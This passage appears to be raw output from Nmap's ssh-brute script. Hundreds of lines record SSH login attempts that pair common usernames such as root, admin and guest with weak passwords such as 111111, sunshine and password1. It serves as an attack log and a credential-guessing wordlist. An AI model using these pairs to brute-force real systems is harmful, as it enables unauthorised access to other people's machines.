2835NSE: [ssh-brute] Trying username/password pair: web:jessica
2836NSE: [ssh-brute] Trying username/password pair: test:jessica
2837NSE: [ssh-brute] Trying username/password pair: root:111111
2838NSE: [ssh-brute] Trying username/password pair: admin:111111
2839NSE: [ssh-brute] Trying username/password pair: administrator:111111
2840NSE: [ssh-brute] Trying username/password pair: webadmin:111111
2841NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
2842NSE: [ssh-brute] Trying username/password pair: netadmin:111111
2843NSE: [ssh-brute] Trying username/password pair: guest:111111
2844NSE: [ssh-brute] Trying username/password pair: user:111111
2845NSE: [ssh-brute] Trying username/password pair: web:111111
2846NSE: [ssh-brute] Trying username/password pair: test:111111
2847NSE: [ssh-brute] Trying username/password pair: root:ashley
2848NSE: [ssh-brute] Trying username/password pair: admin:ashley
2849NSE: [ssh-brute] Trying username/password pair: administrator:ashley
2850NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
2851NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
2852NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
2853NSE: [ssh-brute] Trying username/password pair: guest:ashley
2854NSE: [ssh-brute] Trying username/password pair: user:ashley
2855NSE: [ssh-brute] Trying username/password pair: web:ashley
2856NSE: [ssh-brute] Trying username/password pair: test:ashley
2857NSE: [ssh-brute] Trying username/password pair: root:000000
2858NSE: [ssh-brute] Trying username/password pair: admin:000000
2859NSE: [ssh-brute] Trying username/password pair: administrator:000000
2860NSE: [ssh-brute] Trying username/password pair: webadmin:000000
2861NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
2862NSE: [ssh-brute] Trying username/password pair: netadmin:000000
2863NSE: [ssh-brute] Trying username/password pair: guest:000000
2864NSE: [ssh-brute] Trying username/password pair: user:000000
2865NSE: [ssh-brute] Trying username/password pair: web:000000
2866NSE: [ssh-brute] Trying username/password pair: test:000000
2867NSE: [ssh-brute] Trying username/password pair: root:iloveu
2868NSE: [ssh-brute] Trying username/password pair: admin:iloveu
2869NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
2870NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
2871NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
2872NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
2873NSE: [ssh-brute] Trying username/password pair: guest:iloveu
2874NSE: [ssh-brute] Trying username/password pair: user:iloveu
2875NSE: [ssh-brute] Trying username/password pair: web:iloveu
2876NSE: [ssh-brute] Trying username/password pair: test:iloveu
2877NSE: [ssh-brute] Trying username/password pair: root:michelle
2878NSE: [ssh-brute] Trying username/password pair: admin:michelle
2879NSE: [ssh-brute] Trying username/password pair: administrator:michelle
2880NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
2881NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
2882NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
2883NSE: [ssh-brute] Trying username/password pair: guest:michelle
2884NSE: [ssh-brute] Trying username/password pair: user:michelle
2885NSE: [ssh-brute] Trying username/password pair: web:michelle
2886NSE: [ssh-brute] Trying username/password pair: test:michelle
2887NSE: [ssh-brute] Trying username/password pair: root:tigger
2888NSE: [ssh-brute] Trying username/password pair: admin:tigger
2889NSE: [ssh-brute] Trying username/password pair: administrator:tigger
2890NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
2891NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
2892NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
2893NSE: [ssh-brute] Trying username/password pair: guest:tigger
2894NSE: [ssh-brute] Trying username/password pair: user:tigger
2895NSE: [ssh-brute] Trying username/password pair: web:tigger
2896NSE: [ssh-brute] Trying username/password pair: test:tigger
2897NSE: [ssh-brute] Trying username/password pair: root:sunshine
2898NSE: [ssh-brute] Trying username/password pair: admin:sunshine
2899NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
2900NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
2901NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
2902NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
2903NSE: [ssh-brute] Trying username/password pair: guest:sunshine
2904NSE: [ssh-brute] Trying username/password pair: user:sunshine
2905NSE: [ssh-brute] Trying username/password pair: web:sunshine
2906NSE: [ssh-brute] Trying username/password pair: test:sunshine
2907NSE: [ssh-brute] Trying username/password pair: root:chocolate
2908NSE: [ssh-brute] Trying username/password pair: admin:chocolate
2909NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
2910NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
2911NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
2912NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
2913NSE: [ssh-brute] Trying username/password pair: guest:chocolate
2914NSE: [ssh-brute] Trying username/password pair: user:chocolate
2915NSE: [ssh-brute] Trying username/password pair: web:chocolate
2916NSE: [ssh-brute] Trying username/password pair: test:chocolate
2917NSE: [ssh-brute] Trying username/password pair: root:password1
2918NSE: [ssh-brute] Trying username/password pair: admin:password1
2919NSE: [ssh-brute] Trying username/password pair: administrator:password1
2920NSE: [ssh-brute] Trying username/password pair: webadmin:password1
2921NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
2922NSE: [ssh-brute] Trying username/password pair: netadmin:password1
2923NSE: [ssh-brute] Trying username/password pair: guest:password1
2924NSE: [ssh-brute] Trying username/password pair: user:password1
2925NSE: [ssh-brute] Trying username/password pair: web:password1
2926NSE: [ssh-brute] Trying username/password pair: test:password1
2927NSE: [ssh-brute] Trying username/password pair: root:soccer
2928NSE: [ssh-brute] Trying username/password pair: admin:soccer
2929NSE: [ssh-brute] Trying username/password pair: administrator:soccer
2930NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
2931NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
2932NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
2933NSE: [ssh-brute] Trying username/password pair: guest:soccer
2934NSE: [ssh-brute] Trying username/password pair: user:soccer
2935NSE: [ssh-brute] Trying username/password pair: web:soccer
2936NSE: [ssh-brute] Trying username/password pair: test:soccer
2937NSE: [ssh-brute] Trying username/password pair: root:anthony
2938NSE: [ssh-brute] Trying username/password pair: admin:anthony
2939NSE: [ssh-brute] Trying username/password pair: administrator:anthony
2940NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
2941NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
2942NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
2943NSE: [ssh-brute] Trying username/password pair: guest:anthony
2944NSE: [ssh-brute] Trying username/password pair: user:anthony
2945NSE: [ssh-brute] Trying username/password pair: web:anthony
2946NSE: [ssh-brute] Trying username/password pair: test:anthony
2947NSE: [ssh-brute] Trying username/password pair: root:friends
2948NSE: [ssh-brute] Trying username/password pair: admin:friends
2949NSE: [ssh-brute] Trying username/password pair: administrator:friends
2950NSE: [ssh-brute] Trying username/password pair: webadmin:friends
2951NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
2952NSE: [ssh-brute] Trying username/password pair: netadmin:friends
2953NSE: [ssh-brute] Trying username/password pair: guest:friends
2954NSE: [ssh-brute] Trying username/password pair: user:friends
2955NSE: [ssh-brute] Trying username/password pair: web:friends
2956NSE: [ssh-brute] Trying username/password pair: test:friends
2957NSE: [ssh-brute] Trying username/password pair: root:purple
2958NSE: [ssh-brute] Trying username/password pair: admin:purple
2959NSE: [ssh-brute] Trying username/password pair: administrator:purple
2960NSE: [ssh-brute] Trying username/password pair: webadmin:purple
2961NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
2962NSE: [ssh-brute] Trying username/password pair: netadmin:purple
2963NSE: [ssh-brute] Trying username/password pair: guest:purple
2964NSE: [ssh-brute] Trying username/password pair: user:purple
2965NSE: [ssh-brute] Trying username/password pair: web:purple
2966NSE: [ssh-brute] Trying username/password pair: test:purple
2967NSE: [ssh-brute] Trying username/password pair: root:angel
2968NSE: [ssh-brute] Trying username/password pair: admin:angel
2969NSE: [ssh-brute] Trying username/password pair: administrator:angel
2970NSE: [ssh-brute] Trying username/password pair: webadmin:angel
2971NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
2972NSE: [ssh-brute] Trying username/password pair: netadmin:angel
2973NSE: [ssh-brute] Trying username/password pair: guest:angel
2974NSE: [ssh-brute] Trying username/password pair: user:angel
2975NSE: [ssh-brute] Trying username/password pair: web:angel
2976NSE: [ssh-brute] Trying username/password pair: test:angel
2977NSE: [ssh-brute] Trying username/password pair: root:butterfly
2978NSE: [ssh-brute] Trying username/password pair: admin:butterfly
2979NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
2980NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
2981NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
2982NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
2983NSE: [ssh-brute] Trying username/password pair: guest:butterfly
2984NSE: [ssh-brute] Trying username/password pair: user:butterfly
2985NSE: [ssh-brute] Trying username/password pair: web:butterfly
2986NSE: [ssh-brute] Trying username/password pair: test:butterfly
2987NSE: [ssh-brute] Trying username/password pair: root:jordan
2988NSE: [ssh-brute] Trying username/password pair: admin:jordan
2989NSE: [ssh-brute] Trying username/password pair: administrator:jordan
2990NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
2991NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
2992NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
2993NSE: [ssh-brute] Trying username/password pair: guest:jordan
2994NSE: [ssh-brute] Trying username/password pair: user:jordan
2995NSE: [ssh-brute] Trying username/password pair: web:jordan
2996NSE: [ssh-brute] Trying username/password pair: test:jordan
2997NSE: [ssh-brute] Trying username/password pair: root:fuckyou
2998NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
2999NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
3000NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
3001NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
3002NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
3003NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
3004NSE: [ssh-brute] Trying username/password pair: user:fuckyou
3005NSE: [ssh-brute] Trying username/password pair: web:fuckyou
3006NSE: [ssh-brute] Trying username/password pair: test:fuckyou
3007NSE: [ssh-brute] Trying username/password pair: root:123123
3008NSE: [ssh-brute] Trying username/password pair: admin:123123
3009NSE: [ssh-brute] Trying username/password pair: administrator:123123
3010NSE: [ssh-brute] Trying username/password pair: webadmin:123123
3011NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
3012NSE: [ssh-brute] Trying username/password pair: netadmin:123123
3013NSE: [ssh-brute] Trying username/password pair: guest:123123
3014NSE: [ssh-brute] Trying username/password pair: user:123123
3015NSE: [ssh-brute] Trying username/password pair: web:123123
3016NSE: [ssh-brute] Trying username/password pair: test:123123
3017NSE: [ssh-brute] Trying username/password pair: root:justin
3018NSE: [ssh-brute] Trying username/password pair: admin:justin
3019NSE: [ssh-brute] Trying username/password pair: administrator:justin
3020NSE: [ssh-brute] Trying username/password pair: webadmin:justin
3021NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
3022NSE: [ssh-brute] Trying username/password pair: netadmin:justin
3023NSE: [ssh-brute] Trying username/password pair: guest:justin
3024NSE: [ssh-brute] Trying username/password pair: user:justin
3025NSE: [ssh-brute] Trying username/password pair: web:justin
3026NSE: [ssh-brute] Trying username/password pair: test:justin
3027NSE: [ssh-brute] Trying username/password pair: root:liverpool
3028NSE: [ssh-brute] Trying username/password pair: admin:liverpool
3029NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
3030NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
3031NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
3032NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
3033NSE: [ssh-brute] Trying username/password pair: guest:liverpool
3034NSE: [ssh-brute] Trying username/password pair: user:liverpool
3035NSE: [ssh-brute] Trying username/password pair: web:liverpool
3036NSE: [ssh-brute] Trying username/password pair: test:liverpool
3037NSE: [ssh-brute] Trying username/password pair: root:football
3038NSE: [ssh-brute] Trying username/password pair: admin:football
3039NSE: [ssh-brute] Trying username/password pair: administrator:football
3040NSE: [ssh-brute] Trying username/password pair: webadmin:football
3041NSE: [ssh-brute] Trying username/password pair: sysadmin:football
3042NSE: [ssh-brute] Trying username/password pair: netadmin:football
3043NSE: [ssh-brute] Trying username/password pair: guest:football
3044NSE: [ssh-brute] Trying username/password pair: user:football
3045NSE: [ssh-brute] Trying username/password pair: web:football
3046NSE: [ssh-brute] Trying username/password pair: test:football
3047NSE: [ssh-brute] Trying username/password pair: root:loveme
3048NSE: [ssh-brute] Trying username/password pair: admin:loveme
3049NSE: [ssh-brute] Trying username/password pair: administrator:loveme
3050NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
3051NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
3052NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
3053NSE: [ssh-brute] Trying username/password pair: guest:loveme
3054NSE: [ssh-brute] Trying username/password pair: user:loveme
3055NSE: [ssh-brute] Trying username/password pair: web:loveme
3056NSE: [ssh-brute] Trying username/password pair: test:loveme
3057NSE: [ssh-brute] Trying username/password pair: root:secret
3058NSE: [ssh-brute] Trying username/password pair: admin:secret
3059NSE: [ssh-brute] Trying username/password pair: administrator:secret
3060NSE: [ssh-brute] Trying username/password pair: webadmin:secret
3061NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
3062NSE: [ssh-brute] Trying username/password pair: netadmin:secret
3063NSE: [ssh-brute] Trying username/password pair: guest:secret
3064NSE: [ssh-brute] Trying username/password pair: user:secret
3065NSE: [ssh-brute] Trying username/password pair: web:secret
3066NSE: [ssh-brute] Trying username/password pair: test:secret
3067NSE: [ssh-brute] Trying username/password pair: root:andrea
3068NSE: [ssh-brute] Trying username/password pair: admin:andrea
3069NSE: [ssh-brute] Trying username/password pair: administrator:andrea
3070NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
3071NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
3072NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
3073NSE: [ssh-brute] Trying username/password pair: guest:andrea
3074NSE: [ssh-brute] Trying username/password pair: user:andrea
3075NSE: [ssh-brute] Trying username/password pair: web:andrea
3076NSE: [ssh-brute] Trying username/password pair: test:andrea
3077NSE: [ssh-brute] Trying username/password pair: root:jennifer
3078NSE: [ssh-brute] Trying username/password pair: admin:jennifer
3079NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
3080NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
3081NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
3082NSE: [ssh-brute] Trying username/password pair: netadmin:jennifer
3083NSE: [ssh-brute] Trying username/password pair: guest:jennifer
3084NSE: [ssh-brute] Trying username/password pair: user:jennifer
3085NSE: [ssh-brute] Trying username/password pair: web:jennifer
3086NSE: [ssh-brute] Trying username/password pair: test:jennifer
3087NSE: [ssh-brute] Trying username/password pair: root:joshua
3088NSE: [ssh-brute] Trying username/password pair: admin:joshua
3089NSE: [ssh-brute] Trying username/password pair: administrator:joshua
3090NSE: [ssh-brute] Trying username/password pair: webadmin:joshua
3091NSE: [ssh-brute] Trying username/password pair: sysadmin:joshua
3092NSE: [ssh-brute] Trying username/password pair: netadmin:joshua
3093NSE: [ssh-brute] Trying username/password pair: guest:joshua
3094NSE: [ssh-brute] Trying username/password pair: user:joshua
3095NSE: [ssh-brute] Trying username/password pair: web:joshua
3096NSE: [ssh-brute] Trying username/password pair: test:joshua
3097NSE: [ssh-brute] Trying username/password pair: root:carlos
3098NSE: [ssh-brute] Trying username/password pair: admin:carlos
3099NSE: [ssh-brute] Trying username/password pair: administrator:carlos
3100NSE: [ssh-brute] Trying username/password pair: webadmin:carlos
3101NSE: [ssh-brute] Trying username/password pair: sysadmin:carlos
3102NSE: [ssh-brute] Trying username/password pair: netadmin:carlos
3103NSE: [ssh-brute] Trying username/password pair: guest:carlos
3104NSE: [ssh-brute] Trying username/password pair: user:carlos
3105NSE: [ssh-brute] Trying username/password pair: web:carlos
3106NSE: [ssh-brute] Trying username/password pair: test:carlos
3107NSE: [ssh-brute] Trying username/password pair: root:superman
3108NSE: [ssh-brute] Trying username/password pair: admin:superman
3109NSE: [ssh-brute] Trying username/password pair: administrator:superman
3110NSE: [ssh-brute] Trying username/password pair: webadmin:superman
3111NSE: [ssh-brute] Trying username/password pair: sysadmin:superman
3112NSE: [ssh-brute] Trying username/password pair: netadmin:superman
3113NSE: [ssh-brute] Trying username/password pair: guest:superman
3114NSE: [ssh-brute] Trying username/password pair: user:superman
3115NSE: [ssh-brute] Trying username/password pair: web:superman
3116NSE: [ssh-brute] Trying username/password pair: test:superman
3117NSE: [ssh-brute] Trying username/password pair: root:bubbles
3118NSE: [ssh-brute] Trying username/password pair: admin:bubbles
3119NSE: [ssh-brute] Trying username/password pair: administrator:bubbles
3120NSE: [ssh-brute] Trying username/password pair: webadmin:bubbles
3121NSE: [ssh-brute] Trying username/password pair: sysadmin:bubbles
3122NSE: [ssh-brute] Trying username/password pair: netadmin:bubbles
3123NSE: [ssh-brute] Trying username/password pair: guest:bubbles
3124NSE: [ssh-brute] Trying username/password pair: user:bubbles
3125NSE: [ssh-brute] Trying username/password pair: web:bubbles
3126NSE: [ssh-brute] Trying username/password pair: test:bubbles
3127NSE: [ssh-brute] Trying username/password pair: root:hannah
3128NSE: [ssh-brute] Trying username/password pair: admin:hannah
3129NSE: [ssh-brute] Trying username/password pair: administrator:hannah
3130NSE: [ssh-brute] Trying username/password pair: webadmin:hannah
3131NSE: [ssh-brute] Trying username/password pair: sysadmin:hannah
3132NSE: [ssh-brute] Trying username/password pair: netadmin:hannah
3133NSE: [ssh-brute] Trying username/password pair: guest:hannah
3134NSE: [ssh-brute] Trying username/password pair: user:hannah
3135NSE: [ssh-brute] Trying username/password pair: web:hannah
3136NSE: [ssh-brute] Trying username/password pair: test:hannah
3137NSE: [ssh-brute] Trying username/password pair: root:1234567890
3138NSE: [ssh-brute] Trying username/password pair: admin:1234567890
3139NSE: [ssh-brute] Trying username/password pair: administrator:1234567890
3140NSE: [ssh-brute] Trying username/password pair: webadmin:1234567890
3141NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567890
3142NSE: [ssh-brute] Trying username/password pair: netadmin:1234567890
3143NSE: [ssh-brute] Trying username/password pair: guest:1234567890
3144NSE: [ssh-brute] Trying username/password pair: user:1234567890
3145NSE: [ssh-brute] Trying username/password pair: web:1234567890
3146NSE: [ssh-brute] Trying username/password pair: test:1234567890
3147NSE: [ssh-brute] Trying username/password pair: root:amanda
3148NSE: [ssh-brute] Trying username/password pair: admin:amanda
3149NSE: [ssh-brute] Trying username/password pair: administrator:amanda
3150NSE: [ssh-brute] Trying username/password pair: webadmin:amanda
3151NSE: [ssh-brute] Trying username/password pair: sysadmin:amanda
3152NSE: [ssh-brute] Trying username/password pair: netadmin:amanda
3153NSE: [ssh-brute] Trying username/password pair: guest:amanda
3154NSE: [ssh-brute] Trying username/password pair: user:amanda
3155NSE: [ssh-brute] Trying username/password pair: web:amanda
3156NSE: [ssh-brute] Trying username/password pair: test:amanda
3157NSE: [ssh-brute] Trying username/password pair: root:andrew
3158NSE: [ssh-brute] Trying username/password pair: admin:andrew
3159NSE: [ssh-brute] Trying username/password pair: administrator:andrew
3160NSE: [ssh-brute] Trying username/password pair: webadmin:andrew
3161NSE: [ssh-brute] Trying username/password pair: sysadmin:andrew
3162NSE: [ssh-brute] Trying username/password pair: netadmin:andrew
3163NSE: [ssh-brute] Trying username/password pair: guest:andrew
3164NSE: [ssh-brute] Trying username/password pair: user:andrew
3165NSE: [ssh-brute] Trying username/password pair: web:andrew
3166NSE: [ssh-brute] Trying username/password pair: test:andrew
3167NSE: [ssh-brute] Trying username/password pair: root:loveyou
3168NSE: [ssh-brute] Trying username/password pair: admin:loveyou
3169NSE: [ssh-brute] Trying username/password pair: administrator:loveyou
3170NSE: [ssh-brute] Trying username/password pair: webadmin:loveyou
3171NSE: [ssh-brute] Trying username/password pair: sysadmin:loveyou
3172NSE: [ssh-brute] Trying username/password pair: netadmin:loveyou
3173NSE: [ssh-brute] Trying username/password pair: guest:loveyou
3174NSE: [ssh-brute] Trying username/password pair: user:loveyou
3175NSE: [ssh-brute] Trying username/password pair: web:loveyou
3176NSE: [ssh-brute] Trying username/password pair: test:loveyou
3177NSE: [ssh-brute] Trying username/password pair: root:pretty
3178NSE: [ssh-brute] Trying username/password pair: admin:pretty
3179NSE: [ssh-brute] Trying username/password pair: administrator:pretty
3180NSE: [ssh-brute] Trying username/password pair: webadmin:pretty
3181NSE: [ssh-brute] Trying username/password pair: sysadmin:pretty
3182NSE: [ssh-brute] Trying username/password pair: netadmin:pretty
3183NSE: [ssh-brute] Trying username/password pair: guest:pretty
3184NSE: [ssh-brute] Trying username/password pair: user:pretty
3185NSE: [ssh-brute] Trying username/password pair: web:pretty
3186NSE: [ssh-brute] Trying username/password pair: test:pretty
3187NSE: [ssh-brute] Trying username/password pair: root:basketball
3188NSE: [ssh-brute] Trying username/password pair: admin:basketball
3189NSE: [ssh-brute] Trying username/password pair: administrator:basketball
3190NSE: [ssh-brute] Trying username/password pair: webadmin:basketball
3191NSE: [ssh-brute] Trying username/password pair: sysadmin:basketball
3192NSE: [ssh-brute] Trying username/password pair: netadmin:basketball
3193NSE: [ssh-brute] Trying username/password pair: guest:basketball
3194NSE: [ssh-brute] Trying username/password pair: user:basketball
3195NSE: [ssh-brute] Trying username/password pair: web:basketball
3196NSE: [ssh-brute] Trying username/password pair: test:basketball
3197NSE: [ssh-brute] Trying username/password pair: root:angels
3198NSE: [ssh-brute] Trying username/password pair: admin:angels
3199NSE: [ssh-brute] Trying username/password pair: administrator:angels
3200NSE: [ssh-brute] Trying username/password pair: webadmin:angels
3201NSE: [ssh-brute] Trying username/password pair: sysadmin:angels
3202NSE: [ssh-brute] Trying username/password pair: netadmin:angels
3203NSE: [ssh-brute] Trying username/password pair: guest:angels
3204NSE: [ssh-brute] Trying username/password pair: user:angels
3205NSE: [ssh-brute] Trying username/password pair: web:angels
3206NSE: [ssh-brute] Trying username/password pair: test:angels
3207NSE: [ssh-brute] Trying username/password pair: root:flower
3208NSE: [ssh-brute] Trying username/password pair: admin:flower
3209NSE: [ssh-brute] Trying username/password pair: administrator:flower
3210NSE: [ssh-brute] Trying username/password pair: webadmin:flower
3211NSE: [ssh-brute] Trying username/password pair: sysadmin:flower
3212NSE: [ssh-brute] Trying username/password pair: netadmin:flower
3213NSE: [ssh-brute] Trying username/password pair: guest:flower
3214NSE: [ssh-brute] Trying username/password pair: user:flower
3215NSE: [ssh-brute] Trying username/password pair: web:flower
3216NSE: [ssh-brute] Trying username/password pair: test:flower
3217NSE: [ssh-brute] Trying username/password pair: root:tweety
3218NSE: [ssh-brute] Trying username/password pair: admin:tweety
3219NSE: [ssh-brute] Trying username/password pair: administrator:tweety
3220NSE: [ssh-brute] Trying username/password pair: webadmin:tweety
3221NSE: [ssh-brute] Trying username/password pair: sysadmin:tweety
3222NSE: [ssh-brute] Trying username/password pair: netadmin:tweety
3223NSE: [ssh-brute] Trying username/password pair: guest:tweety
3224NSE: [ssh-brute] Trying username/password pair: user:tweety
3225NSE: [ssh-brute] Trying username/password pair: web:tweety
3226NSE: [ssh-brute] Trying username/password pair: test:tweety
3227NSE: [ssh-brute] Trying username/password pair: root:hello
3228NSE: [ssh-brute] Trying username/password pair: admin:hello
3229NSE: [ssh-brute] Trying username/password pair: administrator:hello
3230NSE: [ssh-brute] Trying username/password pair: webadmin:hello
3231NSE: [ssh-brute] Trying username/password pair: sysadmin:hello
3232NSE: [ssh-brute] Trying username/password pair: netadmin:hello
3233NSE: [ssh-brute] Trying username/password pair: guest:hello
3234NSE: [ssh-brute] Trying username/password pair: user:hello
3235NSE: [ssh-brute] Trying username/password pair: web:hello
3236NSE: [ssh-brute] Trying username/password pair: test:hello
3237NSE: [ssh-brute] Trying username/password pair: root:playboy
3238NSE: [ssh-brute] Trying username/password pair: admin:playboy
3239NSE: [ssh-brute] Trying username/password pair: administrator:playboy
3240NSE: [ssh-brute] Trying username/password pair: webadmin:playboy
3241NSE: [ssh-brute] Trying username/password pair: sysadmin:playboy
3242NSE: [ssh-brute] Trying username/password pair: netadmin:playboy
3243NSE: [ssh-brute] Trying username/password pair: guest:playboy
3244NSE: [ssh-brute] Trying username/password pair: user:playboy
3245NSE: [ssh-brute] Trying username/password pair: web:playboy
3246NSE: [ssh-brute] Trying username/password pair: test:playboy
3247NSE: [ssh-brute] Trying username/password pair: root:charlie
3248NSE: [ssh-brute] Trying username/password pair: admin:charlie
3249NSE: [ssh-brute] Trying username/password pair: administrator:charlie
3250NSE: [ssh-brute] Trying username/password pair: webadmin:charlie
3251NSE: [ssh-brute] Trying username/password pair: sysadmin:charlie
3252NSE: [ssh-brute] Trying username/password pair: netadmin:charlie
3253NSE: [ssh-brute] Trying username/password pair: guest:charlie
3254NSE: [ssh-brute] Trying username/password pair: user:charlie
3255NSE: [ssh-brute] Trying username/password pair: web:charlie
3256NSE: [ssh-brute] Trying username/password pair: test:charlie
3257NSE: [ssh-brute] Trying username/password pair: root:elizabeth
3258NSE: [ssh-brute] Trying username/password pair: admin:elizabeth
3259NSE: [ssh-brute] Trying username/password pair: administrator:elizabeth
3260NSE: [ssh-brute] Trying username/password pair: webadmin:elizabeth
3261NSE: [ssh-brute] Trying username/password pair: sysadmin:elizabeth
3262NSE: [ssh-brute] Trying username/password pair: netadmin:elizabeth
3263NSE: [ssh-brute] Trying username/password pair: guest:elizabeth
3264NSE: [ssh-brute] Trying username/password pair: user:elizabeth
3265NSE: [ssh-brute] Trying username/password pair: web:elizabeth
3266NSE: [ssh-brute] Trying username/password pair: test:elizabeth
3267NSE: [ssh-brute] Trying username/password pair: root:samantha
3268NSE: [ssh-brute] Trying username/password pair: admin:samantha
3269NSE: [ssh-brute] Trying username/password pair: administrator:samantha
3270NSE: [ssh-brute] Trying username/password pair: webadmin:samantha
3271NSE: [ssh-brute] Trying username/password pair: sysadmin:samantha
3272NSE: [ssh-brute] Trying username/password pair: netadmin:samantha
3273NSE: [ssh-brute] Trying username/password pair: guest:samantha
3274NSE: [ssh-brute] Trying username/password pair: user:samantha
3275NSE: [ssh-brute] Trying username/password pair: web:samantha
3276NSE: [ssh-brute] Trying username/password pair: test:samantha
3277NSE: [ssh-brute] Trying username/password pair: root:hottie
3278NSE: [ssh-brute] Trying username/password pair: admin:hottie
3279NSE: [ssh-brute] Trying username/password pair: administrator:hottie
3280NSE: [ssh-brute] Trying username/password pair: webadmin:hottie
3281NSE: [ssh-brute] Trying username/password pair: sysadmin:hottie
3282NSE: [ssh-brute] Trying username/password pair: netadmin:hottie
3283NSE: [ssh-brute] Trying username/password pair: guest:hottie
3284NSE: [ssh-brute] Trying username/password pair: user:hottie
3285NSE: [ssh-brute] Trying username/password pair: web:hottie
3286NSE: [ssh-brute] Trying username/password pair: test:hottie
3287NSE: [ssh-brute] Trying username/password pair: root:chelsea
3288NSE: [ssh-brute] Trying username/password pair: admin:chelsea
3289NSE: [ssh-brute] Trying username/password pair: administrator:chelsea
3290NSE: [ssh-brute] Trying username/password pair: webadmin:chelsea
3291NSE: [ssh-brute] Trying username/password pair: sysadmin:chelsea
3292NSE: [ssh-brute] Trying username/password pair: netadmin:chelsea
3293NSE: [ssh-brute] Trying username/password pair: guest:chelsea
3294NSE: [ssh-brute] Trying username/password pair: user:chelsea
3295NSE: [ssh-brute] Trying username/password pair: web:chelsea
3296NSE: [ssh-brute] Trying username/password pair: test:chelsea
3297NSE: [ssh-brute] Trying username/password pair: root:tinkerbell
3298NSE: [ssh-brute] Trying username/password pair: admin:tinkerbell
3299NSE: [ssh-brute] Trying username/password pair: administrator:tinkerbell
3300NSE: [ssh-brute] Trying username/password pair: webadmin:tinkerbell
3301NSE: [ssh-brute] Trying username/password pair: sysadmin:tinkerbell
3302NSE: [ssh-brute] Trying username/password pair: netadmin:tinkerbell
3303NSE: [ssh-brute] Trying username/password pair: guest:tinkerbell
3304NSE: [ssh-brute] Trying username/password pair: user:tinkerbell
3305NSE: [ssh-brute] Trying username/password pair: web:tinkerbell
3306NSE: [ssh-brute] Trying username/password pair: test:tinkerbell
3307NSE: [ssh-brute] Trying username/password pair: root:shadow
3308NSE: [ssh-brute] Trying username/password pair: admin:shadow
3309NSE: [ssh-brute] Trying username/password pair: administrator:shadow
3310NSE: [ssh-brute] Trying username/password pair: webadmin:shadow
3311NSE: [ssh-brute] Trying username/password pair: sysadmin:shadow
3312NSE: [ssh-brute] Trying username/password pair: netadmin:shadow
3313NSE: [ssh-brute] Trying username/password pair: guest:shadow
3314NSE: [ssh-brute] Trying username/password pair: user:shadow
3315NSE: [ssh-brute] Trying username/password pair: web:shadow
3316NSE: [ssh-brute] Trying username/password pair: test:shadow
3317NSE: [ssh-brute] Trying username/password pair: root:barbie
3318NSE: [ssh-brute] Trying username/password pair: admin:barbie
3319NSE: [ssh-brute] Trying username/password pair: administrator:barbie
3320NSE: [ssh-brute] Trying username/password pair: webadmin:barbie
3321NSE: [ssh-brute] Trying username/password pair: sysadmin:barbie
3322NSE: [ssh-brute] Trying username/password pair: netadmin:barbie
3323NSE: [ssh-brute] Trying username/password pair: guest:barbie
3324NSE: [ssh-brute] Trying username/password pair: user:barbie
3325NSE: [ssh-brute] Trying username/password pair: web:barbie
3326NSE: [ssh-brute] Trying username/password pair: test:barbie
